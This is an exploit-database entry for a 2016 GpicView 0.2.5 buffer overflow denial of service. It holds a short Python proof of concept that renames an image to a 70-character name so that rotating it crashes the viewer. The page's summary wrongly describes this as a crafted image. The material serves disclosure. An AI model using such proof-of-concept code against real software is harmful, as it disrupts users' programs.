header-logo
Suggest Exploit
vendor:
GPicView
by:
David Silveiro
7,5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: GPicView
Affected Version From: 0.2.5
Affected Version To: 0.2.5
Patch Exists: NO
Related CWE: 0 day
CPE: a:lxde:gpicview
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu 14 LTS
2016

GpicView Buffer Overflow DOS

This exploit is a proof of concept for a buffer overflow vulnerability in GpicView, a lightweight image viewer. The exploit requires the user to open a maliciously crafted image file with GpicView, and then rotate the image. This causes a buffer overflow, resulting in a denial of service.

Mitigation:

The user should not open any suspicious image files with GpicView, and should ensure that the 'Auto Save Images' option is not enabled in the preferences.
Source

Exploit-DB raw data:

#!/usr/bin/python
# Exploit Title: GpicView Buffer Overflow DOS
# Date: 25th February 2016
# Exploit Author: David Silveiro (Xino.co.uk)
# Vendor Homepage: lxde.sourceforge.net/gpicview/
# Software Link: https://sourceforge.net/projects/lxde/files/GPicView%20%28image%20Viewer%29/0.2.x/
# Version: 0.2.5
# Tested on: Ubuntu 14 LTS
# CVE : 0 day

#Example: python POC.py [image-file]

from sys        import argv
from subprocess import Popen
from shlex      import split
from time       import sleep
import shutil

def DOS(arg):
                                          #"""------------------------------------"""#
    command    = 'gpicview ' + arg[1]     #'''   Recieve file & construct Popen   '''#
    command_2  = split(command)           #"""------------------------------------"""#
                                          #"|"                                    "|"#
    Popen(command_2)                      #"""      Open file with Gpicview       """#
                                          #"""------------------------------------"""#
    print("Required: You have 15 seconds")
    print("to click on preferences, and ") 
    print("check 'Auto Save Images'     ")         
   
    sleep(15) 
                                          #"""------------------------------------"""#
    buffer = 'A' * 70 + '.png'            #"|"      Rename image with Buffer      "|"#
    shutil.move(arg[1], buffer)           #"""------------------------------------"""#

def main():

    print("Author:   David Silveiro   ")
    print("Company:  Xino.co.uk       ")
    print("   POC Gpicview DOS        ")

    DOS(argv)

    print("File ready for overflow    ")
    print("Now simply rotate the image")


if __name__ == "__main__":
   main()

Navigation

Suggest Exploit

Services By CQR